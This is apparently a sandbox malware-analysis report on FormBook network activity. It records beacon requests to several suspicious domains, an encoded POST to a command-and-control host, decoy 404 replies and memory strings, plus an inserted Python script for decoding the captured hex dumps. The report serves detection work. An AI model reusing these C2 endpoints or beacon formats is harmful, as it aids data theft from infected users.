  GET /zslv/?eL-x=EUn3g8LYsBqqsV8ZNTlu3xKd6tkG7Tp6GSwv0X2RMky81SP9KPrWQ2UszFzoalUNSIFimuT2bUDct3BiYGyyefEtviAnix38iMVeAihtAydc/vF2ig==&wFVH=-zwTKPF0iPth HTTP/1.1
  Host: www.budged.net
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Connection: close
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Source: global traffic | HTTP traffic detected:
  GET /nl7t/?wFVH=-zwTKPF0iPth&eL-x=RWsARM6Yi7RnQLBC+16RpV9reqvPmlYamaxPbU5yIu+RywNq6+kGZBpb8CtNMSbq9u/pp337VPx8joE31Mh05zxcUPnHpfTXXTBrDMJcL7sQ64A9tw== HTTP/1.1
  Host: www.5hdgb2p9a.buzz
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Connection: close
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Source: global traffic | HTTP traffic detected:
  GET /bjtw/?eL-x=csNti9Ni0CMSF+Luu5Lb4YGLWTncdI4NtLZHzGNdKQ96nntWCfQjnA+gcdSxDY8YzUt2/7rDdvxAnlLOvCpJP4lTvOHTPP+iYlkpfhDtlBKj7b5q5w==&wFVH=-zwTKPF0iPth HTTP/1.1
  Host: www.j252mv.site
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Connection: close
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Source: global traffic | HTTP traffic detected:
  GET /u5w9/?eL-x=A3LutOpKcAePelibJkXDDYFDO+A/U7kX8Qw8AI5F82KOCrYaBuw+x7BD9zmk5lVUkEcfBKV2GIclDvoU+V9Cq0mSlb4StpI39XWYwC+owI+4erZmyw==&wFVH=-zwTKPF0iPth HTTP/1.1
  Host: www.lnnn.fun
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Connection: close
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Source: global traffic | HTTP traffic detected:
  GET /dblf/?eL-x=xA4m52UOO3AWG6dLOPkkJ91gfa/sOtMUS9WQ9/7Ili2Upd70ADnAJWaIHnvs9U+whG/nDh7qG8iCbCHdOukQeWX5e+ZPWvcCIT2YOJAlrSuLiE5N6g==&wFVH=-zwTKPF0iPth HTTP/1.1
  Host: www.7153115.xyz
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Connection: close
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Source: global traffic | HTTP traffic detected:
  GET /njro/?wFVH=-zwTKPF0iPth&eL-x=4m2dXuyzH1K67YjRiF0xgcinYZd6F04lkWHhJhjAgk74IEPWOAVZvwb6DAALc1Sd7YFs2hEz0292kCRHtftOb0bCUTNRw6g5HYfyDosdAoVL7yu4Ug== HTTP/1.1
  Host: www.tingba.sbs
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Connection: close
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Source: global traffic | HTTP traffic detected:
  GET /14ny/?eL-x=RcS/7b6AyQg4ZUqZZRdiR4QAk8bBBIP44+AM+xEUzuW33DbFu14QWxhHRozVg07q+e31G6ugIhvO9kCRCtuNtETua9CX3TPbBNSnRMkK6/CxEYN7+Q==&wFVH=-zwTKPF0iPth HTTP/1.1
  Host: www.jllllbx.top
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Connection: close
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                Source: global traffic DNS traffic detected: DNS query: www.mt2rahu.tech
                Source: global traffic DNS traffic detected: DNS query: www.lexjetcenter.net
                Source: global traffic DNS traffic detected: DNS query: www.elarac.top
                Source: global traffic DNS traffic detected: DNS query: www.budged.net
                Source: global traffic DNS traffic detected: DNS query: www.5hdgb2p9a.buzz
                Source: global traffic DNS traffic detected: DNS query: www.j252mv.site
                Source: global traffic DNS traffic detected: DNS query: www.lnnn.fun
                Source: global traffic DNS traffic detected: DNS query: www.7153115.xyz
                Source: global traffic DNS traffic detected: DNS query: www.tingba.sbs
                Source: global traffic DNS traffic detected: DNS query: www.jllllbx.top
                Source: unknown HTTP traffic detected: POST /favd/ HTTP/1.1 Host: www.elarac.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.elarac.top Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 193 Referer: http://www.elarac.top/favd/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5 Data Ascii: eL-x=bvINCE2+At1Sskm7f/AtRoB+kzfYQRKPGeAyqBCLgGEO1e+Jals74GUcsFPbRB+5ZIvUpYpPhLn/nXgrb7YxMxm1cy/wTEpN6wyYWX/91eHCwksxx/TQrWLPBPY9bh/0x9CoVCW8cWI2uq3w+5LjBQ07cmLcq7gl5x4orU+/8NQz5PX78Hcwqr0B3UnU
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 14:50:38 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 14:50:41 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 14:50:43 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 14:50:46 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 14:51:22 GMT Server: Apache Last-Modified: Tue, 13 Sep 2022 05:17:25 GMT Accept-Ranges: bytes Content-Length: 1260 Connection: close Content-Type: text/html
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 14:51:25 GMT Server: Apache Last-Modified: Tue, 13 Sep 2022 05:17:25 GMT Accept-Ranges: bytes Content-Length: 1260 Connection: close Content-Type: text/html
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 14:51:27 GMT Server: Apache Last-Modified: Tue, 13 Sep 2022 05:17:25 GMT Accept-Ranges: bytes Content-Length: 1260 Connection: close Content-Type: text/html
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 14:51:30 GMT Server: Apache Last-Modified: Tue, 13 Sep 2022 05:17:25 GMT Accept-Ranges: bytes Content-Length: 1260 Connection: close Content-Type: text/html
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 14:51:36 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cLiuIp9HcEQPY7hN%2FKJsx3f1DHr3StLqSez%2B7Z1neRXJMz%2BvqB4lxxgIjm9PeCVIbOWNqi5IlrAN0EVTgOsIIWksLBQIvDN9tNv08Cgns2yDYkIwSc6QYnJ4re%2Fwfqc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dee246f2a3f2c8d-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1230&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=758&delivery_rate=0&cwnd=138&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 14:51:39 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sRxxn1pXSDSA587GpSj90oPYxzGyveokoLtTkYyVRy1nq0NLpSZ7kFrJLNqIn6fTWk33gkp1aNqSH3WB3KKNZicB7zbDS7bH4TtPmC77q2ftmHXOU3MNflD2NNwQwpo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dee247f1b5947a5-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1635&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=782&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 14:51:41 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PJLK%2Fxikx%2FDcvxx5Jc8gZS9Qy2wWd0K%2Bw7xLJ6%2Fwn348Zk8gVZEB5r1W4a0%2FtSpFjMbZzaUIdnMuRceUCUjGCOEsp5ddzUbwBwAs%2FqUz%2BZP%2FPq0DArsiNzZ37ZNOjSw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dee248f0b2e3acc-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1406&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1795&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 14:51:44 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZNQc3uvc2%2FuAsP6zaVcAr%2BhmRhWuSGj1ticct0jl4%2Ft65mYmZ1B9MOZ4%2Fnrng2Q1EwIn%2FliL1UlbwyyrrKU6EczUt1iTBieaxAHkSAGQRblKZ8h%2F06yvTc7ztUeXKF0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dee249f0ee56c31-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1152&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=512&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Ascii: d9<h1>Not Found</h1>The requested URL /u5w9/?eL-x=A3LutOpKcAePelibJkXDDYFDO+A/U7kX8Qw8AI5F82KOCrYaBuw+x7BD9zmk5lVUkEcfBKV2GIclDvoU+V9Cq0mSlb4StpI39XWYwC+owI+4erZmyw==&#x26;wFVH=-zwTKPF0iPth was not found on this server.0
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 07 Nov 2024 14:51:58 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Ascii: 148<br><br><center><p style="font-size: 20px;">......</p></center><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"JXOyCm8odVXxhB2w",ck:"JXOyCm8odVXxhB2w"})</script><meta http-equiv="refresh" content="1;url=https://www.bfyer.com?id=84562" />0
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 14:52:04 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q2bwu3RGVfgpHLxGPoBFZXm%2FIGgrTB2UMcvWP2SJhqdPKKiiIS138vuBZ%2FCQwVCU%2BfU1v0hditPSuJ9iEk4sOB%2BcMAZDS3pGhPgvTphh6RAIb0OoWzViv5rppS2Ao9Ez6w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dee251ead6e2cbe-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1194&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=764&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 14:52:07 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tHUpsQX9x3oHguQO0T8TUJU5f3QneL2RGR5ss3rp0jVTb8MOcZAOqEjyzjJk%2FRjk2kyIH%2Bmv8SNKIumEZJOEjgNOKza3E1121%2F4RdyqeeoF2aac2QhfOUcxFeiIcwOyyNA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dee252e8b923596-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1230&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=788&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 14:52:09 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wx%2B6ht8u4hyiYbYz3k9Gm3SlEEsO2%2FCDfAMBI97WHASOPFRYcQxbkiGdHcpEj%2BciGKcL7cuel%2BUEboyIuf7qqgbRoh6Hk%2FiY5QPdsg14xk7T0HobDBEStrLyR7aX%2FMZxiw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dee253e7e1f6b2f-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1187&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1801&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
5b 8f 53 2e ed 27 86 61 e4 84 89 54 21 37 55 8a b3 ff 6b a2 aa 16 e0 98 d0 8d 4d 58 04 92 28 e7 1e 61 df 52 b2 da 33 ad 80 Data Ascii: 461SnF?P$E=, KXXr%9pf4A}QvQteE )RswNo'HGY[%GH)ajjnz=}]_F"EEEh~O|az,R<8S6uTWVzQyTA_H$$}SK%=.7'KS+(SDL5Qd6:HH@\%`O!.T(y*BB`>]\RR62$6}6Y$.>H[Jm_)-!a|W[S.'aT!7UkMX(aR3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:52:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3aVldNir6MSLrNhkt4pj0D6kS7J%2FRcfXH209pBJ9lmQ%2F8NMbYI1zs2jcdc%2B0vHj7jtY29lqQlQSxYexdIc6zob3MAhxaFIOPW4b5dQL%2F0A0ryBtl0XF9p3AFbWi%2BaLBvqg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dee254e6821b78c-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2264&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=514&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 65 38 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 2f e9 a1 b5 e9 9d a2 e4 b8 8d e5 ad 98 e5 9c a8 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 2f 27 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 62 6f 64 79 2c 64 69 76 2c 64 6c 2c 64 74 2c 64 64 2c 75 6c 2c 6f 6c 2c 6c 69 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 70 72 65 2c 63 6f 64 65 2c 66 6f 72 6d 2c 74 65 78 74 61 72 65 61 2c 73 65 6c 65 63 74 2c 6f 70 74 67 72 6f 75 70 2c 6f 70 74 69 6f 6e 2c 66 69 65 6c 64 73 65 74 2c 6c 65 67 65 6e 64 2c 70 2c 62 6c 6f 63 6b 71 75 6f 74 65 2c 74 68 2c 74 64 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 66 69 65 6c 64 73 65 74 2c 
69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 75 6c 2c 6c 69 2c 6f 6c 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 7b 66 6f 6e Data Ascii: 1e86<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><title>404/</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="refresh" content='5; url=/'><style>body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,code,form,textarea,select,optgroup,option,fieldset,legend,p,blockquote,th,td{margin:0;padding:0}fieldset,img{border:0}ul,li,ol{list-style:none}h1,h2,h3,h4,h5,h6{fon
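All three responses above are HTTP 404s from Cloudflare-fronted hosts (Server: cloudflare, cf-cache-status: DYNAMIC), and the "Data Ascii" rendering of the bodies drops everything that is not printable ASCII: the first two bodies are gzip-compressed (Content-Encoding: gzip, body starting 1f 8b) and the third is plain HTML whose title contains non-ASCII text that the ASCII column silently lost. The Python below is added here as a worked example; it is not part of the Joe Sandbox report and not the malware's code. It rebuilds the bytes from the "Data Raw:" hex, parses the HTTP/1.1 chunk header, and either inflates the gzip stream with a streaming decompressor (so a truncated dump still yields a prefix) or decodes the HTML. The two sample dumps are the opening bytes of the first and third responses copied from the report; the gzip sample is deliberately cut short, so `truncated` is reported and only a prefix can be inflated.

```python
import zlib

GZIP_MAGIC = b"\x1f\x8b"

# Constructed sample: opening bytes of the "Data Raw:" field of the first 404
# above (CF-RAY 8dee252e8b923596-DFW), copied from the report and cut short.
GZIP_DUMP = (
    "61 34 34 0d 0a "
    "1f 8b 08 00 00 00 00 00 00 03 "
    "ec 54 c9 8e eb 48 76 dd 37 d0 ff 90 ce 86 51 0d 4b 99 9c 45 4a f9 5e 01 "
    "a4 38 68 16 25 51 12 a5 1d 87 20 19 22 19 24 83 c1 31 91 9f e0 7d a3 61 2f"
)

# Constructed sample: opening bytes of the third 404 above (CF-RAY
# 8dee254e6821b78c-DFW), which is sent uncompressed.
PLAIN_DUMP = (
    "31 65 38 36 0d 0a "
    "3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a "
    "3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f "
    "77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e "
    "3c 68 65 61 64 3e 0d 0a "
    "3c 74 69 74 6c 65 3e 34 30 34 2f e9 a1 b5 e9 9d a2 e4 b8 8d e5 ad 98 e5 9c a8 "
    "3c 2f 74 69 74 6c 65 3e 0d 0a"
)


def parse_hex_dump(dump: str) -> bytes:
    """Turn the space-separated hex of a 'Data Raw:' field back into bytes."""
    return bytes.fromhex("".join(dump.split()))


def split_first_chunk(body: bytes):
    """Parse one HTTP/1.1 chunk: '<hex-size>[;ext]\\r\\n' followed by that many
    bytes. Returns (declared_size, payload_present, truncated)."""
    header, sep, rest = body.partition(b"\r\n")
    if not sep:
        raise ValueError("no chunk-size line in body")
    size = int(header.split(b";")[0], 16)  # chunk extensions are ignored
    payload = rest[:size]
    return size, payload, len(payload) < size


def decode_chunk_payload(payload: bytes):
    """Return (content_encoding, text). A gzip stream is inflated with a
    streaming decompressor so a truncated capture still gives a prefix."""
    if payload.startswith(GZIP_MAGIC):
        inflater = zlib.decompressobj(16 + zlib.MAX_WBITS)  # gzip wrapper
        try:
            data = inflater.decompress(payload)
        except zlib.error:  # corrupt or too little data to finish a block
            data = b""
        return "gzip", data.decode("utf-8", errors="replace")
    return "identity", payload.decode("utf-8", errors="replace")


def analyse_dump(dump: str) -> dict:
    """Summarise one captured response body from its hex dump."""
    size, payload, truncated = split_first_chunk(parse_hex_dump(dump))
    encoding, text = decode_chunk_payload(payload)
    return {
        "chunk_size": size,
        "bytes_present": len(payload),
        "truncated": truncated,
        "encoding": encoding,
        "text": text,
    }


if __name__ == "__main__":
    for name, dump in (("gzip 404", GZIP_DUMP), ("plain 404", PLAIN_DUMP)):
        info = analyse_dump(dump)
        print(name, {k: v for k, v in info.items() if k != "text"})
        print(info["text"][:120])
```

Run on the third response, the decoded title reads "404/页面不存在" ("404/page does not exist") and the body carries a meta refresh back to "/" after five seconds: a generic Chinese-language 404 template rather than a FormBook panel. That does not make the beacon benign. FormBook is known to cycle through decoy domains alongside its real C2, so the request itself (the host, a path such as /14ny/ as seen in the strings below, and any POST body) is the indicator, not the status code the decoy returned.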
                Source: Atuserer.exe, 00000007.00000002.3165412212.0000000005A6E000.00000004.10000000.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000002.3164252655.0000000003BCE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.gmo.jp/images/public/common/logo.gif
                Source: avRLXQyosx.exe, 00000008.00000002.3166059888.00000000054DB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jllllbx.top
                Source: avRLXQyosx.exe, 00000008.00000002.3166059888.00000000054DB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jllllbx.top/14ny/
                Source: Atuserer.exe, 00000007.00000002.3165412212.0000000005A6E000.00000004.10000000.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000002.3164252655.0000000003BCE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.onamae-server.com/
                Source: Atuserer.exe, 00000007.00000002.3165412212.0000000005A6E000.00000004.10000000.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000002.3164252655.0000000003BCE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.onamae.com/?banner_id=634
                Source: Atuserer.exe, 00000007.00000002.3165412212.00000000060B6000.00000004.10000000.00040000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3167412341.0000000007780000.00000004.00000800.00020000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000002.3164252655.0000000004216000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://00808.vip/
                Source: Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Atuserer.exe, 00000007.00000002.3158332138.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: Atuserer.exe, 00000007.00000002.3158332138.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: Atuserer.exe, 00000007.00000002.3158332138.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: Atuserer.exe, 00000007.00000002.3158332138.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
